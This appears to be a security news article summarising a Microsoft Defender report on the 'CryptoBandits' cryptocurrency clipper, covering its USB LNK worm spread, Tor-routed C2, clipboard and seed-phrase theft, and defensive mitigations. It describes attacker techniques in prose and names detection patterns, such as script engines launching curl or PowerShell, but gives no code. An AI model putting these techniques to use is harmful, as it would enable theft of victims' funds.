The **Microsoft Defender Security Research Team** has unveiled details of a cunning cryptocurrency clipper campaign, **CryptoBandits**, which has been operational since February 2026. This campaign leverages clipboard-intercepting malware with worm-like propagation and relies on the **Tor** network to obscure its command-and-control (C2) communications.  ### Evasive Tactics and Tor Integration According to **Microsoft's** analysis, the **CryptoBandits** clipper distinguishes itself by not relying on traditional installers or exposed IP-based C2 infrastructure. Instead, it deploys a portable **Tor** client, routing traffic through a local **SOCKS5** proxy. This allows it to blend data theft with remote code execution, effectively transforming a financially motivated stealer into a lightweight backdoor. "The clipper in this campaign relies on **Windows Script Host** and **ActiveX**-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 server," the **Microsoft Defender Security Research Team** stated. "It carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution." ### How Clipper Malware Operates Clipper malware functions by silently monitoring a user's clipboard for sensitive data. Its primary goal is to intercept cryptocurrency transactions by identifying and substituting legitimate wallet addresses with attacker-controlled ones, thereby rerouting funds. ### Infection and Propagation Mechanism The initial infection vector for **CryptoBandits** involves distributing malicious **Windows Shortcut (LNK)** files via USB storage devices. When an unsuspecting user opens this shortcut, it triggers a worm component. This component first checks if the machine is already infected and, if not, proceeds to fetch the primary payload from a remote server. To ensure propagation, the **LNK** payload scans the USB device for common document types (e.g., DOC, XLSX, PDF). It then hides these legitimate files and creates new **LNK** files with identical names. These new shortcuts contain arguments that link to the worm component, deceiving users into executing the malware when they attempt to open what they believe are harmless documents. ### Persistence and Data Exfiltration Beyond propagation, the worm component establishes scheduled tasks to ensure persistence for both itself and the stealer component. The clipper module, for its part, utilizes **WScript** and **ActiveXObject** for operating system interaction. It also includes an evasion tactic: exiting if **Task Manager** is detected among active processes.  In its final stage, the malware launches a renamed **Tor** binary in a hidden window, generates a unique victim identifier, and registers it with the external C2 server. This establishes a continuous loop where the malware periodically polls the C2 for instructions and monitors the clipboard every 500 milliseconds for seed phrases and private keys. "It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor," **Microsoft** detailed. "If the C2 returns an **EVAL** response, the malware executes attacker-supplied code at runtime." ### Mitigating the Threat **Microsoft** recommends that security defenders prioritize behavioral detections over static signatures. Specifically, organizations should look for **PowerShell**-based screen capture and the use of **WScript**, **CScript**, or related script engines for launching `curl`, `cmd.exe`, `PowerShell`, or unexpected executables. Further mitigation strategies include: * Disabling **AutoRun/AutoPlay** for all removable media. * Blocking **LNK** execution from removable drives via **Group Policy Objects (GPOs)**. * Restricting unnecessary use of `wscript.exe` or `cscript.exe`. * Regularly reviewing clipboard-related and screen-capture behaviors on devices handling sensitive financial workflows. These measures are crucial for protecting against sophisticated threats like **CryptoBandits** that leverage multiple vectors for stealth and persistence.